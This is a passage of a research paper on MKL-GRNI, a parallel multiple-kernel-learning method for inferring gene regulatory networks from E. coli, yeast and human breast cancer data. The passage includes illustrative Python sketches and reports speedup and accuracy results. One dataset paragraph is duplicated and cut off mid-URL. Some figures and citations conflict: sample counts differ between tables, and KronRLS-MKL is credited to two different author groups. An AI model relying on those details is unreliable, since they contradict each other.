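To make the early versus intermediate integration schemes described above concrete, the following minimal Python sketch (an illustration written for this text, not code from any of the cited studies) builds a Gaussian kernel either on concatenated feature vectors or on each data type separately and then sums the kernels; the toy matrices expr and phylo are hypothetical stand-ins for expression and phylogenetic profiles.

import numpy as np

def rbf_kernel(X, gamma=0.1):
    # Gaussian (RBF) kernel from pairwise squared Euclidean distances
    sq = np.sum(X ** 2, axis=1)
    d2 = sq[:, None] + sq[None, :] - 2.0 * X @ X.T
    return np.exp(-gamma * d2)

rng = np.random.default_rng(0)
expr = rng.normal(size=(50, 200))    # 50 genes x 200 expression features (toy data)
phylo = rng.normal(size=(50, 80))    # 50 genes x 80 phylogenetic features (toy data)

# Early integration: concatenate the feature vectors, then build one kernel
K_early = rbf_kernel(np.hstack([expr, phylo]))

# Intermediate integration: one kernel per data type, then add the kernels
K_intermediate = rbf_kernel(expr) + rbf_kernel(phylo)

print(K_early.shape, K_intermediate.shape)    # both (50, 50)

Both constructions yield valid positive semi-definite kernels of the same size and can be passed to any kernel classifier; late integration would instead train one SVM per kernel and combine their discriminant scores.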
In another study, Ben-Hur & Noble (2005) applied kernel methods to PPI studies and proposed a pairwise kernel between two pairs of proteins in order to construct a similarity matrix. This pairwise kernel is based on three sequence kernels: a spectrum kernel, a motif kernel, and a Pfam kernel. They further extended this experiment to explore the effect of adding kernels from non-sequence data, such as gene ontology annotations, homology scores and the mutual clustering coefficient (MCC) derived from protein interactions computed in each cross-validation fold. Integrating these non-sequence features with the pairwise kernel resulted in better performance than any method by itself. Another integration and supervised learning method that uses MKL is Feature Selection Multiple Kernel Learning (FSMKL), proposed by Seoane et al. (2013). The feature selection is performed on a variable number of features per kernel, separating feature sets from each data type with greater relevance to the given problem. The selection criterion uses statistical scoring, ranking features that are statistically aligned with the class labels, together with biological insights, whereby genes that are present in a specific pathway are chosen. They integrate gene expression, copy number variation and other genomic data from KEGG pathways. These data are transformed into their base kernels and integrated using the MKL framework into a combined kernel. The prior biological knowledge in the form of pathway information serves as the central criterion for FSMKL to cluster samples. The authors claim that FSMKL performance is comparable to the other state-of-the-art breast cancer prognosis methods from the DREAM challenge. Speicher & Pfeifer (2015) adopted an unsupervised approach to discover cancer subtypes from an integrated kernel using MKL. The proposed method, called Regularized MKL Locality Preserving Projections (rMKL-LPP), integrates multi-omics data such as gene expression, DNA methylation and miRNA expression profiles of multiple cancer types from TCGA (Tomczak, Czerwińska & Wiznerowicz, 2015). This regularized version extends the dimensionality reduction variant of the MKL technique (MKL-DR) proposed by Yan et al. (2007). The regularization term allows different types of kernels to be used during the optimization process and also avoids overfitting. They cluster the samples by applying k-means on the distance summation of each sample's k-nearest neighbors obtained by applying Locality Preserving Projections (LPP). Many approaches have also been proposed for parameter estimation of such large-scale and integrated models. Besides cross-validation, grid search and randomised parameter optimization methods, Remli et al. (2019) proposed a cooperative enhanced scatter search for parameter estimation of high-dimensional biological models. Their proposed method is executed in a parallel environment and can be faster than other methods in providing accurate estimates of model parameters. The multiple kernel learning approach has also been applied to the domain of drug-target interaction network inference and drug bioactivity prediction. For drug-target interaction prediction, Nascimento, Prudêncio & Costa (2016) proposed a new MKL-based algorithm that selects and combines kernels automatically on a bipartite drug-protein prediction problem.
Their proposed method extends the Kronecker regularized least squares approach (KronRLS) (Van Laarhoven, Nabuurs & Marchiori, 2011) to fit in an MKL setting. The method uses L2 regularization to produce a non-sparse combination of base kernels. The proposed method can cope with large drug vs. target interaction matrices, does not require sub-sampling of the drug-target network, and is also able to combine and select relevant kernels. They performed a comparative analysis of their proposed method with top performers from single and integrative kernel approaches and demonstrated the competitiveness of KronRLS-MKL in all the evaluated scenarios. Similarly, for drug bioactivity prediction, Cichonska et al. (2018) proposed a pairwise MKL method in order to address the scalability issues in handling massive pairwise kernel matrices, in terms of both the computational complexity and the memory demands of such prediction problems. The proposed method has been successfully applied to drug bioactivity inference problems and provides a general approach to other pairwise MKL spaces. Since MKL is applied to solve large-scale learning problems, various efforts have been undertaken to devise schemes whereby the MKL algorithm can be run in a multiprocessor and distributed computational environment. The authors in Chen & Fan (2014) proposed a parallel multiple kernel learning (PMKL) approach using a hybrid alternating direction method of multipliers (H-ADMM). The proposed method makes the local processors co-ordinate with each other to achieve the global solution. The results of their experiments demonstrated that PMKL displays fast execution times and higher classification accuracies. Another important study addressing the scalability and computational requirements of large-scale learning has been carried out by Alioscha-Perez, Oveneke & Sahli (2019). They proposed SVRG-MKL, an MKL solution with inherent scalability properties that can combine multiple descriptors involving millions of samples. They conducted extensive experimental validation of their proposed method on several benchmarking datasets, confirming a higher accuracy and a significant speedup for SVRG-MKL. In one of our recent works, we proposed a data fusion and inference model, called iMTF-GRN, based on non-negative matrix tri-factorization that integrates diverse types of biological data (Wani & Raza, 2019b). The advantage of our proposed parallel MKL-GRNI approach is that it is simple to implement and does not need complex coding to distribute multiple classification problems in a multiprocessor environment. Our method employs shared queue objects for distributing inputs and collecting outputs from multiple processors, compared to PMKL (Chen & Fan, 2014), where multiple processors are explicitly made to co-ordinate using the hybrid alternating direction method of multipliers (H-ADMM), introducing complexity and an added computational overhead. Also, we chose the basic addition operation to fuse multiple kernels, compared to the KronRLS-MKL (Cichonska et al., 2018) method, where the fusion of multiple kernels is achieved by performing a Kronecker product operation that requires calculating the inverse of individual kernels, hence a computational overhead compared to a basic arithmetic operation.
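The design choice just described—additive kernel fusion versus Kronecker-product fusion—can be illustrated with a small sketch written for this text (not taken from any of the cited methods); it only contrasts the sizes of the fused matrices, using random positive semi-definite matrices as stand-ins for data-derived kernels.

import numpy as np

rng = np.random.default_rng(1)
n = 30    # number of genes, kept small so the Kronecker product stays manageable

def random_psd(n):
    # A @ A.T is symmetric positive semi-definite, standing in for a real kernel
    A = rng.normal(size=(n, n))
    return A @ A.T

K_expr, K_meth = random_psd(n), random_psd(n)

K_sum = K_expr + K_meth            # additive fusion: result stays n x n
K_kron = np.kron(K_expr, K_meth)   # Kronecker-style fusion: result is n^2 x n^2

print(K_sum.shape, K_kron.shape)   # (30, 30) (900, 900)

For genome-scale problems, this quadratic-versus-quartic growth in matrix size is what makes the simple sum attractive here.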
Also, for the MKL implementation we used the Shogun toolbox, which is a highly optimized, stable and efficient tool developed in C++ by Sonnenburg et al. (2010), making it a suitable candidate for computing-intensive and large-scale learning problems.
MATERIALS AND METHODS
The proposed method adopts a supervised approach to learn new interactions between a TF and the whole genome of an organism. The algorithm operates on multiple datasets that characterize the genes of an organism. Since we are adopting an integrated approach, datasets such as gene expression, known TF-gene regulations, PPI and DNA-methylation data can be combined using the MKL approach. All these datasets are carefully chosen owing to their role in gene regulation. The TF-gene interaction data serves a dual purpose: it supplies the algorithm with prior knowledge about the regulatory relationships, and, for each TF, the known target gene list also forms the labels for the MKL classifier. For each TF, a set of known gene targets serves as positive examples. For negative examples, we divide our input into two subsets; the MKL classifier is trained using the positive examples, for which no prediction is needed, and the other subset contains the negative examples. We perform 10-fold cross-validation using the same scheme and obtain discriminant values for all the genes with no prior regulation knowledge for this TF. This whole procedure is repeated for all the TFs. The idea here is to identify the set of genes whose expression profiles match those of the positive examples, even though the classifier is supplied with some false negative examples in the training set. A graphical overview of this architecture is depicted in Fig. 1.
The problem of GRN inference from integrated datasets through supervised learning using MKL is not a trivial task, and its complexity rises manifold when considering GRN inference for organisms with large genome sizes. In this scenario, model training and testing become TF specific. Therefore, the inference problem is decomposed into a set of classification subproblems corresponding to the total number of TFs present in the input gene-TF interaction matrix. A sequential approach to such a problem scenario would require running each subproblem one after the other in a loop; however, as we increase the number of TFs, the execution time of the algorithm also increases. To overcome such problems, we devise a strategy of parallel execution for the algorithm wherein multiple subproblems run simultaneously across different processors of a multi-processor hardware platform, as explained in Algorithm 1. Outputs generated by each model in the form of confidence scores (the probability that a given TF regulates a gene) are stored in a shared queue object. Once all the subproblems finish their execution, the shared object is iterated to collect the results generated by all the models in order to build a single output matrix. In case the number of TFs is greater than the number of available processors, they are split into multiple groups and dispatched to each processor such that all the processors receive an equal number of classification models. A minimal sketch of this scheme is given below, and the full procedure is summarized in Algorithm 1.
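The following Python sketch illustrates the per-TF job distribution and the shared queue described above; it is an illustrative outline, not the released MKL-GRNI code, and the worker function train_one_tf (which here ignores the labels and returns dummy scores) is a hypothetical placeholder for the actual Shogun-based MKL training step.

import multiprocessing as mp
import numpy as np

def train_one_tf(tf_name, K, labels, queue):
    # Hypothetical worker: a real version would fit an MKL/SVM model for this TF
    # on the combined kernel K using its regulation labels; here we only emit
    # dummy decision scores of the correct length.
    scores = np.random.default_rng().normal(size=K.shape[0])
    queue.put((tf_name, scores))

if __name__ == "__main__":
    n_genes = 1000
    K = np.eye(n_genes)                        # stand-in for the combined kernel
    tf_list = ["TF%d" % i for i in range(32)]  # e.g., 32 transcription factors
    rng = np.random.default_rng(0)
    R = {tf: rng.choice([-1, 1], size=n_genes) for tf in tf_list}  # label columns

    queue = mp.Queue()
    jobs = []
    for tf in tf_list:                         # one process per TF subproblem
        p = mp.Process(target=train_one_tf, args=(tf, K, R[tf], queue))
        p.start()
        jobs.append(p)

    results = dict(queue.get() for _ in jobs)  # drain the shared queue
    for p in jobs:
        p.join()

    DS = np.column_stack([results[tf] for tf in tf_list])  # genes x TFs scores
    print(DS.shape)                            # (1000, 32)

A production version would typically cap the number of worker processes at the CPU count (for example with multiprocessing.Pool) rather than spawning one process per TF.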
Figure 1. Application architecture of MKL-GRNI: (A) combined kernel; (B) decomposed regulation matrices; (C) parallel distribution and model building; (D) model execution; (E) writing results to a shared object. (Full-size DOI: 10.7717/peerj-cs.363/fig-1)

Algorithm 1: MKL-GRNI, a parallel approach for supervised inference of large-scale gene regulatory networks.
Input: k datasets D1, D2, …, Dk
Input: regulation binary matrix R for classification labels
Output: a matrix of decision scores DS for TF-gene interactions
begin
  Transform D1, D2, …, Dk into kernels K1, K2, …, Kk using appropriate kernel functions
  Fuse the k kernels as K = K1 + K2 + … + Kk
  Define the MKL parameters params (C, norm, epsilon)
  /* Distribute the source TFs among multiple CPUs */
  foreach cpu in the CPU list do in parallel
    foreach TF in the source TF list assigned to this cpu do
      /* Set MKL parameters and data */
      mkl.kernel ← K
      mkl.labels ← R[:, TF]
      mkl.parameters ← params
      /* Obtain decision scores for the MKL algorithm between each TF and all genes in the genome */
      DS_TF ← ApplyMKL()
      put DS_TF in queue Q
    end
  end
  foreach q in Q do
    DS[:, TF(q)] ← q.val
  end
end

Kernel methods for genomic data fusion
Kernel methods represent a mathematical framework which embeds data points (genes, proteins, drugs, etc.) from an input space I into a feature space F by employing a kernel function. Genomic datasets, viz. mRNA expression levels from RNA-seq, DNA methylation profiles and the TF-gene regulation matrix obtained from different databases, comprise heterogeneous datasets that can be fused using kernel methods and serve as the building blocks for inference of gene regulatory networks. As a modular and generic approach to pattern analysis, kernel methods can operate on very high dimensional data in feature space by performing an inner product on the input data using a kernel function (Shawe-Taylor & Cristianini, 2004). An algorithm is devised that can work with such data and learn patterns. Such an algorithm is more generic as it operates on any data type that can be kernelized. These kernels are data specific, such as Gaussian, polynomial and sigmoid kernels for vectorial data, diffusion kernels for graph data, and string kernels for different types of sequence data. The kernel part being data specific creates a flexible and modular approach to combining multiple modules to obtain complex learning systems. A graphical depiction of this fusion technique is shown in Fig. 2.

Figure 2. Genomic data fusion by combining kernel matrices from multiple kernels into a single combined kernel. (Full-size DOI: 10.7717/peerj-cs.363/fig-2)

The choice of different kernel functions for transforming datasets into their respective kernel matrices is made after a thorough analysis of the literature in the field of kernel methods and MKL methods.
MKL model
Multiple kernel learning is based on integrating many features of objects such as genes, proteins, drugs, etc., via their kernel matrices and represents a paradigm shift from
machine learning models that use single object features (Sonnenburg et al., 2006). This combined information from multiple kernel matrices is provided as an input to the MKL algorithm to perform classification/regression tasks on unseen data. The information represented by the kernel matrices can be combined by applying basic algebraic operations, such as addition, multiplication and exponentiation, such that the positive semi-definiteness of the candidate kernels is preserved in the final kernel matrix. The resultant kernel can be defined by the following equations, using k1 and k2 as candidate kernel matrices and ϕ1(x) and ϕ2(x) as their corresponding embeddings in the feature space:
K = k1 + k2    (1)
with the new induced embedding
ϕ(x) = (ϕ1(x), ϕ2(x))    (2)
Given a kernel set K = {k1, k2, …, km}, an affine combination of m parametrized kernels can be formed as:
K = Σ_{i=1}^{m} μi ki    (3)
subject to the constraint that the weights μi are positive, that is, μi ≥ 0, i = 1, …, m. With these kernel matrices as input, a statistical classifier such as SVM separates the two classes using a linear discriminant by inducing a margin in the feature space. To find this discriminant, an optimization problem known as a quadratic program (QP) needs to be solved. QP belongs to a class of convex optimization problems, which are easily solvable. The Shogun toolbox solves this MKL optimization problem using semidefinite programming (SDP), first implemented for MKL learning by Lanckriet et al. (2004). Based on this margin, we classify SVM algorithms into hard, 1-norm soft and 2-norm soft margin SVMs. Here we use the 1-norm soft margin SVM and SDP for MKL optimization and classification from heterogeneous datasets, as explained in our earlier work on MKL for biomedical image analysis (Wani & Raza, 2018). A detailed literature on SVM algorithms is covered in Scholkopf & Smola (2001).
Datasets
To test the parallel MKL algorithm on multiple datasets, we downloaded gene expression data of Escherichia coli and Saccharomyces cerevisiae from the DREAM5 network inference challenge (Marbach et al., 2012), along with their gold standard networks, and human breast cancer transcriptomic data from TCGA. Some prominent features of these data are shown in Table 1. Because the MKL paradigm provides the platform to fuse heterogeneous datasets, we downloaded PPI data for both E. coli and S. cerevisiae from the STRING database (Szklarczyk et al., 2011). The PPI data is supplied as prior biological knowledge to the algorithm in order to improve its inference accuracy, as MKL can learn from multiple datasets. To supplement the human transcriptome with additional biological knowledge, we download DNA methylation expression data for all the genes in the transcriptome from the TCGA Broad Institute data portal (https://gdac.broadinstitute.org/). The regulation data (i.e., known interactions between genes and TFs) for E. coli and S. cerevisiae were extracted from the gold standard network provided in the DREAM dataset; however, for GRN inference in humans, the regulation data has been collected from a number of databases that store TF-gene interaction data derived from ChIP-seq and ChIP-ChIP experiments. We collected a list of 66 TFs from the ENCODE data portal (https://www.
Datasets
To test the parallel MKL algorithm on multiple datasets, we downloaded gene expression data of Escherichia coli and Saccharomyces cerevisiae from the DREAM5 network inference challenge (Marbach et al., 2012), along with their gold standard networks, and human breast cancer transcriptomic data from TCGA. Some prominent features of these data are shown in Table 1. Because the MKL paradigm provides the platform to fuse heterogeneous datasets, we also downloaded PPI data for both E. coli and S. cerevisiae from the STRING database (Szklarczyk et al., 2011). The PPI data is supplied as prior biological knowledge to the algorithm in order to improve its inference accuracy, as MKL can learn from multiple datasets. To supplement the human transcriptome with additional biological knowledge, we downloaded DNA methylation expression data for all the genes in the transcriptome from the TCGA Broad Institute data portal (https://gdac.broadinstitute.org/). The regulation data (i.e., known interactions between genes and TFs) for E. coli and S. cerevisiae were extracted from the gold standard network provided in the DREAM dataset; for GRN inference in humans, however, the regulation data was collected from a number of databases that store TF-gene interaction data derived from ChIP-seq and ChIP-ChIP experiments. We collected a list of 66 TFs from the ENCODE data portal (https://www.encodeproject.org/) for which ChIP-seq experiments were carried out on MCF7 breast cancer cell lines across different experimental labs. The targets of these TFs were extracted from the ENCODE (ENCODE Project Consortium, 2004), TRED (Jiang et al., 2007) and TRRUST (Han et al., 2015) databases.

Table 1. Dataset description of different organisms for supervised GRN inference.
Organism       Genes   Samples  Transcription factors  Known regulations  Known targets
E. coli         4,297      805                    140              1,979            953
S. cerevisiae   5,657      536                    120              4,000          2,721
Homo sapiens   19,201    1,212                     66             73,052         12,028

Hardware and software requirements
The hardware platform used in this study is an IBM System X3650 M4 server with an Intel Xeon processor having 24 cores and a primary memory of 32 GB, extendable to 64 GB. The system supports a 64-bit memory addressing scheme with 3.2 GHz/1066 MHz Intel Xeon processors, a 1066 MHz front-side bus (FSB) and 4 MB of L2 cache (each processor is dual core and comes with 2 × 2 MB (4 MB) of L2 cache). The system also supports hyper-threading for more efficient program execution. In order to exploit the multi-core and multithreading features of this hardware, we used the multiprocessing Python package to dispatch different sub-problems across multiple cores of the computing system. The distribution of the different learning sub-problems among the cores of a multi-core machine is demonstrated in Fig. 1. For the fusion of multiple datasets we use the MKL approach, whereby the different datasets are first converted into similarity matrices (kernels) and then joined to generate a final integrated matrix for learning TF-gene targets. We use the MKL Python library provided by the Shogun machine learning toolbox to implement the proposed algorithm.

RESULTS
All the genomic datasets are transformed into their respective kernel matrices by using an appropriate kernel function. For example, datasets such as gene expression and DNA methylation expression data are transformed using a Gaussian radial basis function. The PPI data is converted into a diffusion kernel, K = e^(βH), where H = A − D is the negative Laplacian derived from the adjacency matrix A and degree matrix D of the PPI graph. The TF-target gene regulation data is organized as a binary matrix of labels (i.e., 1 and −1) with genes in rows and TFs in columns. The number of rows corresponds to the genome size of the organism and the number of columns corresponds to the total number of TFs being used for GRN inference. The elements of each column with value 1 signify that a gene gi is regulated by TFj, and −1 otherwise. Such an organization of the regulation data allows us to use each column of the matrix as the label vector for an individual classification problem in a supervised learning environment. We perform two sets of experiments with our proposed approach in order to evaluate the scalability and the inference potential of supervised learning from heterogeneous datasets using the MKL paradigm. Our first experiment records the execution times required to learn from varying genome and sample sizes on single and multi-processor architectures, given a set of TFs. Our second experiment focuses on the evaluation of the inference potential of this approach on different genome and sample sizes.
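As a concrete reference for the kernel transformations described above, the sketch below builds a Gaussian RBF kernel for expression-like data and a diffusion kernel K = e^(βH) with H = A − D for a PPI graph, using NumPy/SciPy. The gamma and beta values, and the toy data, are arbitrary illustrative choices rather than the parameters used in the study.

```python
import numpy as np
from scipy.linalg import expm
from scipy.spatial.distance import pdist, squareform

def rbf_kernel(X, gamma=0.1):
    """Gaussian RBF kernel between rows of X (e.g., genes x samples expression data)."""
    sq_dists = squareform(pdist(X, "sqeuclidean"))
    return np.exp(-gamma * sq_dists)

def diffusion_kernel(adjacency, beta=0.5):
    """Diffusion kernel K = expm(beta * H) with H = A - D (negative graph Laplacian)."""
    degree = np.diag(adjacency.sum(axis=1))
    H = adjacency - degree
    return expm(beta * H)

# Toy usage: expression profiles for 4 genes and a 4-node PPI graph.
expr = np.random.rand(4, 10)
ppi = np.array([[0, 1, 0, 0],
                [1, 0, 1, 0],
                [0, 1, 0, 1],
                [0, 0, 1, 0]], dtype=float)
K_expr = rbf_kernel(expr)
K_ppi = diffusion_kernel(ppi)
```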
Since our problem of GRN inference is complex, the experiment aims to evaluate the parallel nature of the MKL algorithm by decomposing the supervised inference of GRNs for multiple TFs into a number of subproblems and distributing them to multiple processors for parallel execution. Varying the genome and sample sizes in these experiments evaluates how efficiently MKL-based models scale to large genomes, where most of the GRN models developed to date do not perform optimally, as reported in Marbach et al. (2012). The proposed method is implemented in Python, and the code along with the data is available at https://github.com/waninisar/MKL-GRNI. To assess the performance of the parallel MKL-GRNI on the different genomes characterized by the datasets in Table 1, we execute the algorithm and embed the required code for the evaluation metrics. Once the algorithm completes its execution run, all the essential metrics are recorded for further analysis. The metrics are computed to evaluate the capacity of our approach in terms of reduced computational cost and enhanced inference accuracy when dealing with complex and large-scale inference tasks. Initially the algorithm is run in sequential mode for all the organisms for a set of 32 TFs, and later in parallel mode on 8 and 16 CPUs. Performance metrics for all the datasets are plotted in Fig. 3. A brief description of these performance metrics is given below:

SPEEDUP
We calculate speedup as a measure of the relative performance of executing our algorithm in sequential and parallel processing environments. The speedup is calculated as:

S(j) = T(1) / T(j)    (4)

where S(j) is the speedup on j processors, T(1) is the time the program takes on a single processor and T(j) is the time the program takes on j processors.

EFFICIENCY
Efficiency is defined as the ratio of speedup to the number of processing elements (j CPUs in our case). It measures the utilization of the computation resources for a fraction of time. Ideally, in a parallel system, speedup is equal to j and efficiency is equal to 1. However, in practice, speedup is less than j and efficiency lies between zero and one, depending on the effectiveness with which the processing elements are utilized. We calculate efficiency E(j) on j processors as:

E(j) = S(j) / j    (5)

REDUNDANCY
Redundancy is computed as the ratio between the number of operations executed in parallel and sequential modes. It measures the required increase in the number of computations when the algorithm is run on multiple processors.

R(j) = O(j) / O(1)    (6)

QUALITY
Quality measures the relevance of using parallel computation and is defined as the ratio of the product of speedup and efficiency to redundancy.

Q(j) = S(j) × E(j) / R(j)    (7)

Figure 3: Performance metrics for the parallel MKL-GRNI algorithm: (A) Speedup, (B) Efficiency, (C) Redundancy, (D) Quality.
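The four metrics defined in Eqs. (4)-(7) are straightforward to compute once the sequential and parallel timings and operation counts are recorded; a minimal sketch (the timing values in the example are made up for illustration):

```python
def speedup(t_seq, t_par):
    """Eq. (4): S(j) = T(1) / T(j)."""
    return t_seq / t_par

def efficiency(s_j, j):
    """Eq. (5): E(j) = S(j) / j."""
    return s_j / j

def redundancy(ops_par, ops_seq):
    """Eq. (6): R(j) = O(j) / O(1)."""
    return ops_par / ops_seq

def quality(s_j, e_j, r_j):
    """Eq. (7): Q(j) = S(j) * E(j) / R(j)."""
    return s_j * e_j / r_j

# Example: a run that takes 120 s on 1 CPU and 20 s on 8 CPUs.
s = speedup(120.0, 20.0)                       # 6.0
e = efficiency(s, 8)                           # 0.75
q = quality(s, e, redundancy(1.1e9, 1.0e9))    # relevance of the parallel run
```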
It is evident from Fig. 3 that there is a marked increase in the speedup as we move from sequential (single CPU) to parallel execution (i.e., 8 and 16 CPUs). For an E. coli genome with a sample size of 500 and 32 TFs used for inference, the algorithm shows a sharp speedup as we move from sequential execution to parallel execution on 8 processors; however, when the number of processors is increased to 16, there is only a marginal increase in speedup for E. coli. On the other hand, there is a considerable increase in speedup recorded for 8 and 16 processors on the larger genomes, such as S. cerevisiae and Homo sapiens, suggesting an increase in the capacity of the parallel algorithm to reduce the execution times. Regarding resource utilization, the efficiency metric shows a considerable drop in the utilization of compute resources for all three datasets, because only a section of the algorithm runs in parallel. This can be inferred from the computed redundancy for sequential and parallel executions. The redundancy plot shows only a slight increase in the computational cost incurred when running our problem in parallel, thereby suggesting little computational overhead as we switch from sequential to parallel mode of execution. To evaluate the relevance of parallel execution to our problem, we calculate the quality metric for all three datasets. From the barplots we can observe that parallel algorithms are less relevant when applied to smaller genomes, as is evident in the case of E. coli, but there is a steady improvement in the quality metric as we move from S. cerevisiae to Homo sapiens, with a high relevance indicator when the yeast dataset is run on 8 processors and the human dataset on 16 processors. These improvements in the speedup and quality metrics when running the algorithm in parallel provide us with a framework to work with more complex datasets and organisms with large genome sizes to infer very large-scale GRNs using a supervised approach.

To assess the inference potential of this supervised method, we compare the proposed approach with other methods that infer gene interactions from single and integrated datasets. Initially, we applied MKL-GRNI to the DREAM5 E. coli data and performed a 10-fold cross-validation to make sure that the model is trained on all the known regulations. At each cross-validation step, important performance metrics such as precision, recall and F1 score are recorded and then averaged over the whole cross-validation procedure. We then compared our network inference method with inference methods that predict TF-target gene regulations, such as CLR (Faith et al., 2007) and SIRENE (Mordelet & Vert, 2008). The results are recorded in Table 2. After running all the inference procedures, we observed that the average precision, recall and F1 metrics generated by MKL-GRNI are considerably higher than those generated by the other comparable methods. The improvement with MKL-GRNI can be attributed to the additional biological knowledge, in the form of protein-protein interactions between E. coli genes, that aids the inference process. To test the proposed method on integrated data, we perform a 10-fold cross-validation procedure on the input data. In this experiment, the known target genes of each organism, as given in Table 1, are split into training and test sets. The model is trained on the features from the training set, the network inference is performed on the genes in the test set, and the evaluation metrics, such as precision, recall and F1 scores, are recorded for each iteration and averaged across cross-validation runs.
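A schematic of the per-TF cross-validation loop described above, using scikit-learn utilities for the folds and metrics; the SVC with a precomputed kernel stands in for the Shogun MKL classifier actually used and is only meant to illustrate the procedure.

```python
import numpy as np
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import precision_score, recall_score, f1_score
from sklearn.svm import SVC  # stand-in for the Shogun MKL classifier

def cross_validate_tf(K, labels, n_splits=10):
    """10-fold CV for one TF: K is a precomputed (combined) kernel, labels are +1/-1."""
    folds = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=0)
    scores = []
    for train, test in folds.split(np.zeros((len(labels), 1)), labels):
        clf = SVC(kernel="precomputed", C=1.0)
        clf.fit(K[np.ix_(train, train)], labels[train])        # train-vs-train kernel
        pred = clf.predict(K[np.ix_(test, train)])              # test-vs-train kernel
        scores.append((precision_score(labels[test], pred),
                       recall_score(labels[test], pred),
                       f1_score(labels[test], pred)))
    return np.mean(scores, axis=0)  # average precision, recall, F1 over the folds
```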
Table 3 summarizes these metrics for varying genome and sample sizes for the human breast cancer dataset, and Table 4 contains results for all three genomes. It is evident from these results that the MKL-GRNI algorithm scales well to larger genome sizes. These metrics highlight the learning and inference potential of MKL. Looking at Table 3, we observe an average recall of 80% and an average precision of 58%, with an average F1 measure of 65%, for a genome size of 5,000 and a sample size of 100, and an increase in these metrics as we increase the sample size to 500 and 1,000, respectively. However, as we start increasing the size of the genome, these metrics show a gradual decline for smaller sample sizes and again a marginal increase as we increase the sample size for a fixed genome size. Although there is no direct rule for determining the number of samples corresponding to the size of the genome in omics studies, the improvements in precision, recall and F1 measures suggest an improvement in the learning and inference potential of the MKL algorithm with an increase in the number of samples. The tabulated metrics for all three genomes in Table 4 also show a considerable decline in the evaluation metrics as we move from smaller to larger genomes, suggesting a decrease in the inference potential of the algorithm for larger datasets. The possible decline in the performance metrics can be attributed to the increase in genome size as we move from simple prokaryotic to more complex eukaryotic genomes. This increase in genome size relative to the sample size leads to the curse of dimensionality, making it difficult to learn properly from skewed datasets.

Table 2. Average precision, recall and F1 measures for various inference methods.
Method     Average precision  Average recall  Average F1 score
CLR                    0.275            0.55              0.36
SIRENE                 0.445            0.73              0.55
MKL-GRNI               0.46             0.97              0.62

Table 3. Precision, recall and F1 measures recorded for different combinations of genome and sample sizes for the breast cancer data.
No. of genes  No. of samples  Average recall  Average precision  Average F1 measure
       5,000             100          0.8005             0.5817              0.6582
       5,000             500          0.8005             0.6169              0.6848
       5,000           1,000          0.8354             0.6347              0.6968
      10,000             100          0.7350             0.4406              0.5509
      10,000             500          0.7660             0.4537              0.5699
      10,000           1,000          0.7860             0.4937              0.6065
      19,201             100          0.7499             0.3746              0.4996
      19,201             500          0.7444             0.3893              0.5112
      19,201           1,000          0.7499             0.4246              0.5422

Table 4. Precision, recall and F1 measures averaged across cross-validation runs for complete genomes.
Organism       No. of genes  No. of samples  Avg. precision  Avg. recall  Avg. F1 measure
E. coli               4,297             802            0.46         0.97             0.62
S. cerevisiae         5,657             536            0.42         0.84             0.56
Homo sapiens         19,201           1,012            0.37         0.73             0.49

We also compare our MKL-GRNI with the recently developed integrative random forest for gene regulatory network inference (iRafNet) (Petralia et al., 2015). We select the DREAM5 datasets of E. coli and S. cerevisiae and integrate the PPI and gene expression data from both datasets. For MKL, we build Gaussian and diffusion kernels from the expression and PPI data. For iRafNet, the expression data serves as the main data and the PPI data is used as support data. Sampling weights are then derived from the PPI data by building a diffusion kernel as K = e^H, where H is a graph Laplacian for the PPI data.
Sampling weights from K are derived as WPPI(i, j) = K(i, j), that is, the element K(i, j). The sampling weights thus obtained are then integrated with the main dataset (i.e., the gene expression data). Putative regulatory links are then predicted using importance scores generated with the iRafNet R package. The AUC and AUPR scores obtained using iRafNet and MKL-GRNI are listed in Table 5. The AUC and AUPR scores of MKL-GRNI are comparable to those of iRafNet for both datasets. However, iRafNet reports a lower AUC and a higher AUPR score compared to MKL-GRNI when run on the E. coli data. Once we move towards a larger genome size, these scores start dropping marginally for both the iRafNet and MKL-GRNI approaches. The slightly higher AUC scores in the case of MKL-GRNI can be attributed, to some extent, to the skewed class label distribution, wherein negative labels far outnumber the positive ones because of the limited known regulations. This class imbalance leads to higher predictive accuracy (AUC) but lower precision-recall scores (AUPR). On the other hand, regression-based GRN inference techniques have been reported to perform well for smaller genomes, with GENIE3 (Huynh-Thu et al., 2010) being a star performer in the DREAM5 network inference challenges. The higher AUPR generated by iRafNet in the case of E. coli can be attributed to the way potential regulators are sampled using prior information from the sampling weights (PPI), therefore decreasing false positives and increasing precision and recall. But for larger genomes (i.e., yeast in our case) the performance of both approaches begins to fall, as reported by Mordelet & Vert (2008). The present implementation of iRafNet does not provide the ability to run the random forest algorithm in parallel. Therefore, using iRafNet for GRNI of larger genomes can incur a huge computational cost by running thousands of decision trees in sequential mode.

Table 5. AUC and AUPR scores for E. coli and S. cerevisiae using iRafNet and MKL-GRNI.
Datasets        iRafNet AUC  iRafNet AUPR  MKL-GRNI AUC  MKL-GRNI AUPR
E. coli               0.901         0.552         0.925           0.44
S. cerevisiae         0.833         0.39          0.89            0.42

Since our main motive in this study is to parallelize the inference algorithm for large-scale GRNI, the higher speedup and higher quality provided by running MKL-GRNI in parallel can be used as a trade-off for a slightly lower AUPR compared to iRafNet run in sequential mode with marginally higher AUPR scores.

DISCUSSION AND CONCLUSION
Here we present a scalable and parallel approach to GRN inference using MKL as the integration and supervised learning framework. The algorithm has been implemented in Python using the Python interface to MKL provided by the Shogun machine learning toolbox (Sonnenburg et al., 2010). The ability of kernel methods in pattern discovery and learning from genomic data fusion of multi-omics data using MKL has already been demonstrated in a number of inference studies. Our focus here is to explore the scalability option for large-scale GRN inference in a supervised machine learning setting, besides assessing the inference potential across different genomes. The approach undertaken can be considered a parallel extension to SIRENE (Mordelet & Vert, 2008). Although SIRENE performs better than other unsupervised and information-theoretic inference methods, as reported by Mordelet & Vert (2008),
